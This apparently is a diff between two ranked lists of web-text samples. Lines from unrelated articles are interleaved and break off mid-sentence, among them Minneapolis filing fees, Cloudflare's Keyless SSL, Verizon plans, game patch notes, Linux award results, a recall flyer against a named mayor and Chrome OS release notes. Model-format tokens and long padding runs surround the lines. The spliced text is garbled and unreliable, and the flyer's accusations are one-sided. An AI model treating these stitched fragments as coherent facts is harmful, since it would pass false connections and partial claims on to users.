Rochester's fee went from $25 to $50 in 1988. Duluth's? Still $20. +She later said she had misunderstood a question asked during the interview and was well aware there had been no Canadian 9/11 connection, but added that the Canada-U.S. border had, in the past, posed a security risk to Americans. The next day, Napolitano appeared at a border conference and suggested Canada was more lax in its immigration policies than the U.S., alleging Canadian authorities allow people into the country that would not pass muster south of the border. Napolitano has also ruffled diplomatic feathers with her insistence that the Canadian border must not be treated any differently than the U.S.-Mexican boundary, where a drug war rages and countless illegal immigrants flood into America every year. McCain expressed some sympathy for Canada on that front on Friday. -The new Minneapolis fees are intended to be entered into the overhauled city charter that voters overwhelmingly approved Tuesday. The revised charter takes effect in 2015. But first they have to go before the City Council, which can change them and send them back to the charter commission for another vote before they're entered into the charter. Commission chairman Barry CLegg said that if the council refuses to act, the proposal will go directly to voters in 2014. He said he'd expect overwhelming support. +Article Continued +================================================================================ +Rank = 59; Score = 2457600.0 +<|begin_of_text|>Content delivery network and Web security company Cloudflare has made a name for itself by fending off denial-of-service attacks against its customers large and small. Today, it's launching a new service aimed at winning over the most paranoid of corporate customers. The service is a first step toward doing for network security what Amazon Web Services and other public cloud services have done for application services—replacing on-premises hardware with virtualized services spread across the Internet. -Rice first proposed raising the mayoral filing fee to $300, pointing out that he didn't want to judge the seriousness of any candidate, but did want to make sure that they filed campaign finance reports, which a $100 expenditure triggers. He also said he didn't think it should cost more to file for mayor than it does for U.S. Senate ($500) and governor ($400). +Called Keyless SSL, the new service allows organizations to use Cloudflare’s network of 28 data centers around the world to defend against distributed denial of service attacks on their websites without having to turn over private encryption keys. Keyless SSL breaks the encryption “handshake” at the beginning of a Transport Layer Security (TLS) Web session, passing part of the data back to the organization’s data center for encryption. It then negotiates the session with the returned data and acts as a gateway for authenticated sessions—while still being able to screen out malicious traffic such as denial of service attacks. -But the rest of the board upped the ante, also raising the fee to enter a city council race from $20 to $250, and the fee to run for Park and Recreation Board and the Board of Estimate and Taxation from $20 to $100. +In an interview with Ars, Cloudflare CEO Matthew Prince said that the technology behind Keyless SSL could help security-minded organizations embrace other cloud services while keeping a tighter rein on them. “If you decide you’re going to use cloud services today, how you set policy across all of these is impossible," he said. "Now that we can do this, fast forward a year, and we can do things like data loss prevention, intrusion detection… all these things are just bytes in the stream, and we’re already looking at them.” -"$500 today is not a barrier," said Commissioner Todd Ferrara. +All of that puts Cloudflare on a path to, as Prince put it, do to Cisco and other network hardware suppliers what AWS and other cloud services have done to Hewlett-Packard and Dell-type server vendors. The technology could also help extend Internet services to areas of the world that lack the sort of trustworthy data centers that Cloudflare and other cloud providers operate from, as it keeps their most precious secrets locked away back at the core of their networks. -Twenty dollars in 1972 would be worth $111.70 today. +Changing the locks -Candidate Bob "Again" Carney agreed that Tuesday's ballot was "cumbersome." He said the higher filing fee might have +The development of Keyless SSL began about two years ago, on the heels of a series of massive denial of service attacks against major financial institutions alleged to have been launched from Iran. “We got a series of fairly frantic calls from those banks saying they needed help with this problem,” Prince said. “We met with JP Morgan Chase, Goldman Sachs… pretty much everyone in that community. They described to us a challenge that put them between a rock and a hard place. They had spent billions on hardware ================================================================================ -Rank = 57; Score = 4587520.0 -<|begin_of_text|>With all the cowardly decisions, especially the recent National Anthem enforcement and the concussions (CTE) deceptions, the real question is: Why does Roger Goodell make $44 mil a year for running the NFL, a monopoly sanctioned by Congress? +Rank = 60; Score = 2441216.0 +<|begin_of_text|>jeremy -Maybe the NFL is in cahoots with Washington to distract the citizenry from lawmakers’ own doings, much like the “bread and circuses” of ancient Rome. Football diverts attention and placates the masses. (It’s also said to satisfy men’s innate lust for war but, just to make sure, Washington has us in a bunch of real wars, too.) +root -Trump, to his credit, clearly loves football; why else would he wear that helmet hair? But getting rid of the taxpayer-subsidized, tax-exempt status, antitrust exemptions, etc. of the NFL would be a good move for Trump right now. +Registered: Jun 2000 Distribution: Debian, Red Hat, Slackware, Fedora, Ubuntu Posts: 12,933 -With all its revenues, why can’t the NFL stand on its own? Anheuser-Busch alone paid $1.4 billion for NFL rights. If you want to sell beer to 18-34-year-old males, the NFL’s the place. If you want to sell power tools, also advertise on the NFL, although maybe also the WNBA. +Rep: -The American justice system, like the NFL, has tons of laws and rules, often laws layered upon laws by the ruling classes so they can prosecute whom they want, when they want, for whatever they want. Thus, it is within the power of the NFL and its beleaguered commissioner, Roger Goodell, to pursue one thing and not another. Just ask “Deflate-gate” victim Tom Brady. +2007 LinuxQuestions.org Members Choice Award Winners -Goodell has had a long string of odd decisions. He toyed with penalties for uttering the N-word or sexist slurs. Yet he weighed free speech issues and reached a compromise: Players can listen to rap music but are not allowed to sing along. +Desktop Distribution of the Year - Ubuntu (30.83%) -Goodell has dictatorially tinkered with some rules; he once decreed that players can no longer celebrate TDs by dunking the football over the goalpost crossbars. That didn’t go over well. If Americans wanted to watch a sport with no dunking, we’d watch Ivy League college basketball. +Server Distribution of the Year - Debian (30.30%) -Goodell threatened North Carolina and threatened to pull the Super Bowl from Arizona over legislation he viewed as anti-gay. He didn’t follow through with his threat, but the publicity dashed any hopes Arizona or North Carolina had of hosting the Tony Awards. And the gay rodeo business is non-existent -================================================================================ -Rank = 58; Score = 4587520.0 -<|begin_of_text|>The electronic billboard is on the Command Transportation building near Niles Center Road. +Live Distribution of the Year - KNOPPIX (22.88%) -Friday's epic USA versus Canada Winter Olympic hockey matchup highlighted another spat between the two countries involving pop star Justin Bieber. +Database of the Year - MySQL (54.36%) -A new electronic scoreboard in a Chicago suburb shows Chicago Blackhawks forward Patrick Kane -- who plays for the USA -- and Team Canada's Jonathan Toews in between a picture of Bieber. The caption says "Loser Keeps Biebs." +Office Suite of the Year - OpenOffice.org (89.50%) -Bieber, who's Canadian, lives in Los Angeles, but after several high-profile incidents, many Americans have called for the singer to be deported. +Browser of the Year - Firefox (74.03%) -Best of the Sochi Olympics: Day 13 +Desktop Environment of the Year - KDE (52.08%) -Bieber is also infamous among Chicagoans for a controversy he ignited after the Hawks won the Stanley Cup championship last year. +Window Manager of the Year - Compiz (33.65%) -While the singer was in the Blackhawks' locker room at the United Center taking pictures of the trophy, he was photographed standing on the Indian head logo, prompting a huge outcry of anger from fans of the team. +Messaging App of the Year - Pidgin (53.90%) -After Canada won the Olympic gold medal game in Sochi, 1-0, the company immediately followed up with a new billboard below. +Mail Client of the Year - Thunderbird (53.72%) -Hey Canada, best 2 out of 3… errr… best 3 out of 5? pic.twitter.com/n7tLp8qyu0 — Command Sign (@CommandSign) February 21, 2014<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 59; Score = 4521984.0 -<|begin_of_text|>USA Soccer 2016 Logo +Virtualization Product of the Year - VirtualBox (41.58%) -The US Soccer national team today finally unveiled its new logo. Following the design language established by the overwhelmingly popular centenary crest, the new US Soccer logo boasts the US national teams' iconic navy and red in a sleek arrangement. This is the new US Soccer badge, introduced on February 29, 2016.Drawing inspiration from the previous US Soccer logo's badge shape, the new USA national team crest simplifies a lot elements of the old crest, while also shifting the colors to darker and less cartoony shades of blue and red.The three stars and the ball from the 1993 crest have been ditched, making place for a bold navywriting at the top of the badge. Dynamic red stripes adorn the lower half of the new USA soccer logo.Barely changed since its creation in 1993 and often mocked for its outdated 1990s look, the US Soccer badge has been in need for a redesign for a long time. Building on the success of the centenary crest seems a very viable and logical decision, in the interest of the US national team's fans.After Nike and US Soccer renewed their kit supplier contract until 2022, the two worked side by side on the new US Soccer badge, which is set to be first used on the new United States 2016 Home and Away Kits. The new USA Jerseys are set to be worn at the first-ever Copa America on US-soil, the 2016 centenary tournament.What do you think of the new 2016 USA national team logo? Drop us a line below.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 60; Score = 4521984.0 -<|begin_of_text|>Kady O’Malley is joining Maclean’s to cover the Manning Conference, hosted by Canada’s leading think tank for the right. She’ll be filing frequently over the course of the two-day conference—keep track at her Manning Manifests page, here. Watch the broadcast live all weekend here. +Audio Media Player Application of the Year - Amarok (57.37%) -Well, let’s start with the positive: the Manning Centre organizers kept their promise to deliver a “unique” debate experience, at least in contrast to the majority of the fourteen-wide face-offs that have characterized the race so far. +Audio Authoring Application of the Year - Audacity (68.24%) -Instead of lining the stage from curtain to curtain with candidates, they drew names from a hat and called them on stage in groups—two groups of four and two groups of three—with one topic per mini-slot, complete with answers, rebuttals and even the occasional outbursts of direct interaction between the candidates. +Video Media Player Application of the Year - mplayer (41.78%) -Serving as moderator was the inimitable Tom Clark, who signed off his journalistic duties at Global News earlier this year to take up a government relations gig at Global Public Affairs, but handled his brief return to the interview chair with ease and obvious enjoyment, even—or possibly especially—when he was obliged to cut the mic on an overly loquacious contestant. +Video Authoring Application of the Year - mencoder (24.21%) -(Those TV host reflexes stay sharp for at least a few months after hanging up the earpiece, apparently.) +Multimedia Utility of the Year - K3b (63.34%) -What was clear, however, from the post-debate chatter at the meet-the-candidate reception that capped off the official conference activities for the day, was that it still wasn’t enough to knock the contestants off script and into the sort of spontaneous, off-the-cuff exchange of views that can, in a nanosecond, change the course of a campaign and, eventually, Canadian political history. +Graphics Application of the Year - GIMP (69.15%) -Forget “no knockout punches”—except for a few brief back-and-forths over health care (Chris Alexander and Kellie Leitch), trade negotiations (Lisa Raitt and Maxime Bernier) and the Canadian bona fides of Kevin O’Leary (O’Leary, Andrew Scheer and Deepak Obhrai)—the candidates were far too focused on delivering their now familiar applause and laugh lines. +Network Security Application of the Year - nmap (24.95%) -Leitch reminded everyone of her plan for face-to-face screenings at border crossings. Scheer praised pipelines. Chong defended his proposal for a “revenue neutral carbon tax.” Bernier decried supply management. O’Leary raged over deficits and taxes—particularly provincial. Andrew Saxton reminded everyone he was, and is, a businessman. Brad Trost and Pierre Lemieux—who, by -================================================================================ -Rank = 61; Score = 4456448.0 -<|begin_of_text|>Verizon is getting rid of contract plans, switching its offerings over to month-to-month plans like AT&T and T-Mobile did before it. Verizon's new plans are all based around shared data buckets — there's no single line or family plan. Instead, subscribers pay for a specific amount of data and then pay a per-device fee to hook it into the plan. +Host Security Application of the Year - SELinux (30.69%) -Everyone loves per-line access fees! +Monitoring Application of the Year - Nagios (38.58%) -The options include 1GB for $30 per month, 3GB for $45 per month, 6GB for $60 per month, and 12GB for $80 per month. Adding a smartphone to the plan is $20 per month, adding a tablet or hotspot is $10 per month, and adding a smartwatch is $5 per month. Verizon says that larger plans will be available for those who want them; for those who just need a little bit of extra data one month, Recode reports that they'll be stuck paying $15 for an extra gigabyte, though they can always jump up to a new plan the next month. As usual, the pricing is not really friendly or tailored for anyone, but Verizon is under the odd impression that it's easier to understand. +Windows on Linux App of the Year - Wine (84.76%) -The plans go live next Thursday, on August 13th. Current Verizon subscribers will be able to hang onto their existing plans or switch over to the new plans "with some restrictions." +IDE/Web Development Editor of the Year - Eclipse (22.29%) -Though doing away with contracts is a big shift, it's something we've seen coming. T-Mobile kicked off the trend about two years ago, and AT&T began following it recently by dropping contract offerings from third-party sellers. Alongside the shift away from contracts is the shift away from subsidized phones, meaning that people are going to need to start buying phones at full price or using carriers' payment plans. Verizon has been offering such a plan under the name Edge, though it's now decided to rename it "device payment option," which actually is easier to understand.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 62; Score = 4423680.0 -<|begin_of_text|>Content delivery network and Web security company Cloudflare has made a name for itself by fending off denial-of-service attacks against its customers large and small. Today, it's launching a new service aimed at winning over the most paranoid of corporate customers. The service is a first step toward doing for network security what Amazon Web Services and other public cloud services have done for application services—replacing on-premises hardware with virtualized services spread across the Internet. +Shell of the Year - bash (87.33%) -Called Keyless SSL, the new service allows organizations to use Cloudflare’s network of 28 data centers around the world to defend against distributed denial of service attacks on their websites without having to turn over private encryption keys. Keyless SSL breaks the encryption “handshake” at the beginning of a Transport Layer Security (TLS) Web session, passing part of the data back to the organization’s data center for encryption. It then negotiates the session with the returned data and acts as a gateway for authenticated sessions—while still being able to screen out malicious traffic such as denial of service attacks. +Text Editor of the Year - vi/vim (36.37%) -In an interview with Ars, Cloudflare CEO Matthew Prince said that the technology behind Keyless SSL could help security-minded organizations embrace other cloud services while keeping a tighter rein on them. “If you decide you’re going to use cloud services today, how you set policy across all of these is impossible," he said. "Now that we can do this, fast forward a year, and we can do things like data loss prevention, intrusion detection… all these things are just bytes in the stream, and we’re already looking at them.” +File Manager of the Year - Konqueror (38.00%) -All of that puts Cloudflare on a path to, as Prince put it, do to Cisco and other network hardware suppliers what AWS and other cloud services have done to Hewlett-Packard and Dell-type server vendors. The technology could also help extend Internet services to areas of the world that lack the sort of trustworthy data centers that Cloudflare and other cloud providers operate from, as it keeps their most precious secrets locked away back at the core of their networks. +Open Source Game of the Year - Battle for Wesnoth (21.74%) -Changing the locks +Programming Language of the Year - Python (21.78%) -The development of Keyless SSL began about two years ago, on the heels of a series of massive denial of service attacks against major financial institutions alleged to have been launched from Iran. “We got a series of fairly frantic calls from those banks saying they needed help with this problem,” Prince said. “We met with JP Morgan Chase, Goldman Sachs… pretty much everyone in that community. They described to us a challenge that put them between a rock and a hard place. They had spent billions on hardware +Winners should expect an email, including a nice winners badge in about a day or so. If you have any questions or suggestions on how we can improve the MCA's next year, do let me know. Visit + +--jeremy The polls are closed and the results are in. We had a record number of votes cast for the seventh straight year. Congratulations should go to all nominees. We had some extremely close races this year. Without further ado, here are the winners:Desktop Distribution of the Year - ================================================================================ -Rank = 63; Score = 4390912.0 -<|begin_of_text|>Version 0.10.2 +Rank = 61; Score = 2441216.0 +<|begin_of_text|>Why Recall? Here’s a look back at Tom McKay’s first 14 months in office: -Content: +1. In a sexual harassment special investigation by former NJ Deputy Attorney General Lee Vartan, Tom McKay was found to have sexually harassed the Township clerk and a rent leveling board volunteer by describing them as lesbians and calling them “man-haters”. McKay never apologized to either woman, but rather blames his actions on his political opponents. The investigation costs Lopatcong taxpayers more than $10,000 and the council must censure the mayor. CensureResolution -Added a new Intelligence Skill - Incinerate: Launches a torrent of fire from your hand. The longer you repeatedly cast the spell from the same location, the larger and more damaging the flames become. +2. Tom McKay is served with a Tort Claims notice of intent to sue subjecting the Township and its taxpayers to substantial liability for his sexual harassment behavior. -Added a new cosmetic microtransaction effect - Blue Flame Incinerate: Replaces the standard flame of Incinerate with a ghostly blue fire. +3. Tom McKay gavels Councilwoman Maureen McCabe in a public meeting and yells at her to “shut up.” Again, he refuses to take responsibility for losing his temper. -Added a new cosmetic microtransaction effect - Tiki Totem: Replaces the standard Spell Totem or Ranged Attack Totem with a coloured totem that has carved tiki designs. +4. Tom McKay publicly posts his personal “10 Commandments” for behavior at public meetings, but when a resident posts beside it her 10 criticisms of his public demeanor, he has them removed. The town receives legal notice from the resident’s lawyer that the Mayor violated her First Amendment rights. -Added four new Unique items, three of which were designed by our Diamond Supporters. +5. Tom McKay secretly secured access to the Township’s security cameras without the knowledge or consent of the Council. He also accepted those services as a gift from a Township vendor in violation of his terms of office. -Added a new flamethrower ability to Snakes in the Dark Forest. +6. Lopatcong Township loses its credit status with many of its vendors due to the Mayor’s refusal to pay bills on time. Many vendors take a “payment in advance” policy with the Township. -Monster packs in end-game Map areas have had their size variance increased. +7. Tom McKay refused to consider the request led by Councilwoman Ciesla to refinance to Township’s debt obligation, for spite not business, and COST Lopatcong taxpayers $200,000. -The Solaris/Lunaris Temple tilesets have been improved and should now have higher performance. +8. Tom McKay’s politically motivated banking decisions COST Lopatcong $20,000 in lost revenues. -Added a new 3v3 PvP arena. One of the other arenas has been disabled temporarily while we fix a problem. +9. Tom McKay offered to trade his vote to reappoint the Township’s attorney and engineer for promises that they will not contribute to his opponents’ political campaign. -Improved blood effects. +10. Tom McKay replaces a long time member of the Township Planning Board with a non-US citizen political ally who, at public meetings, refuses to Pledge Allegiance to the US Flag. -Improved the Ice Spear and Lightning Arrow effects. +11. Tom McKay attempts to appoint his personal sexual harassment defense lawyer as the Township’s new labor lawyer. When the Council objects, he sues them. -Improved the performance of Ground Ice and Ground Tar. +12. Tom McKay attempts to appoint his personal attorney as the Township’s new general attorney +================================================================================ +Rank = 62; Score = 2424832.0 +<|begin_of_text|>The Stable channel has been updated to 28.0.1500.68 for all Chrome OS devices (Platform version: 4100.68.0 for all devices except Cr-48, which was updated to 4100.78.0). This build contains a number of feature enhancements, bug fixes and security improvements. Machines will be receiving updates over the next several days. -Improved the gem icons to be slightly better from a colour blindness point of view. +Release Highlights: -Continued to incrementally improve the art, effects and environments. +Numerous crash fixes and performance improvements. -Features: +Speed improvements for the Files app, along with support for files that are Shared with me and Recent on Google Drive. -The passive skill tree now requires confirmation before changes are applied. This prevents accidental misclicks. If you want to skip this confirmation, ctrl+click the passive and no window will be displayed. +Monitor Rotation and Scaling - you can scale your UI smaller and rotate the screen on all Chromebooks. -We've added a "Lost Password" button to the main menu. +Notification pop-up message appears when screenshots are taken. Clicking on the notification will bring you right to the screenshot. -Pressing Ctrl+up in chat allows you to cycle through previous players you've talked to via whisper in this session. +Replaced the Japanese IME with a NaCl extension version downloads a better language model upon actual usage. -Chat messages that are more than one line long now indent subsequent lines so that it's harder to confuse other players with fake messages. +Added transliteration IMEs for Indic languages from Google Input Tools. -There's now a /clear_ignore_list command that will remove all entries from the list of accounts you are ignoring chat messages from. Better management of ignore lists is coming in the future. +Touch link highlighting on Chromebook Pixel - we now provide feedback on which link you click or button you press. -Players in an area are now always granted the quest status of having killed a boss regardless of who killed it. +Updated Chrome Office Viewer (Beta) extension -The performance statistics overlay (F1) can now be bound to other keys. +Pepper Flash updated to 11.8.800.94 -Audio Changes: +Known issues: -Added PvP announcer audio for various events in matches. +On Acer C7 Chromebooks, docked mode has been disabled when connecting to an external monitor. -Added personalised introductions for Nessa. +I f you find new issues, please let us know by visiting our help site or filing a bug. Interested in switching channels? Find out how. You can submit feedback using ‘Report an issue...’ in the Chrome menu (3 horizontal bars in the upper right corner of the browser). -Added a few more Nessa greetings. +Danielle Drew -Added new Tarkleigh greetings. +Google Chrome<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 63; Score = 2408448.0 +<|begin_of_text|>Yes, Eric Shin­seki had to go, and he prob­ably knew it him­self once the hor­ror stor­ies sur­faced. As the re­tired four-star gen­er­al learned at West Point, the com­mand­er is 